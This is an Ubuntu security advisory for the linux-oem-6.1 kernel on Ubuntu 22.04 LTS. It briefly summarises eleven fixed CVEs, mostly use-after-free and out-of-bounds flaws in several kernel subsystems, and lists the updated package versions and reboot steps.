    =========================================================================Ubuntu Security Notice USN-6639-1February 15, 2024linux-oem-6.1 vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-oem-6.1: Linux kernel for OEM systemsDetails:It was discovered that a race condition existed in the ATM (AsynchronousTransfer Mode) subsystem of the Linux kernel, leading to a use-after-freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-51780)It was discovered that a race condition existed in the AppleTalk networkingsubsystem of the Linux kernel, leading to a use-after-free vulnerability. Alocal attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-51781)It was discovered that a race condition existed in the Rose X.25 protocolimplementation in the Linux kernel, leading to a use-after- freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-51782)Alon Zahavi discovered that the NVMe-oF/TCP subsystem of the Linux kerneldid not properly handle connect command payloads in certain situations,leading to an out-of-bounds read vulnerability. A remote attacker could usethis to expose sensitive information (kernel memory). (CVE-2023-6121)Jann Horn discovered that a race condition existed in the Linux kernel whenhandling io_uring over sockets, leading to a use-after-free vulnerability.A local attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-6531)Xingyuan Mo discovered that the netfilter subsystem in the Linux kernel didnot properly handle dynset expressions passed from userspace, leading to anull pointer dereference vulnerability. A local attacker could use this tocause a denial of service (system crash). (CVE-2023-6622)It was discovered that the IGMP protocol implementation in the Linux kernelcontained a race condition, leading to a use-after-free vulnerability. Alocal attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-6932)Robert Morris discovered that the CIFS network file system implementationin the Linux kernel did not properly validate certain server commandsfields, leading to an out-of-bounds read vulnerability. An attacker coulduse this to cause a denial of service (system crash) or possibly exposesensitive information. (CVE-2024-0565)Dan Carpenter discovered that the netfilter subsystem in the Linux kerneldid not store data in properly sized memory locations. A local user coulduse this to cause a denial of service (system crash). (CVE-2024-0607)Jann Horn discovered that the TLS subsystem in the Linux kernel did notproperly handle spliced messages, leading to an out-of-bounds writevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2024-0646)Yang Chaoming discovered that the KSMBD implementation in the Linux kerneldid not properly validate request buffer sizes, leading to an out-of-boundsread vulnerability. An attacker could use this to cause a denial of service(system crash) or possibly expose sensitive information. (CVE-2024-22705)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  linux-image-6.1.0-1033-oem      6.1.0-1033.33  linux-image-oem-22.04           6.1.0.1033.34  linux-image-oem-22.04a          6.1.0.1033.34  linux-image-oem-22.04b          6.1.0.1033.34  linux-image-oem-22.04c          6.1.0.1033.34After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-6639-1  CVE-2023-51780, CVE-2023-51781, CVE-2023-51782, CVE-2023-6121,  CVE-2023-6531, CVE-2023-6622, CVE-2023-6932, CVE-2024-0565,  CVE-2024-0607, CVE-2024-0646, CVE-2024-22705Package Information:  https://launchpad.net/ubuntu/+source/linux-oem-6.1/6.1.0-1033.33

Tag

#apple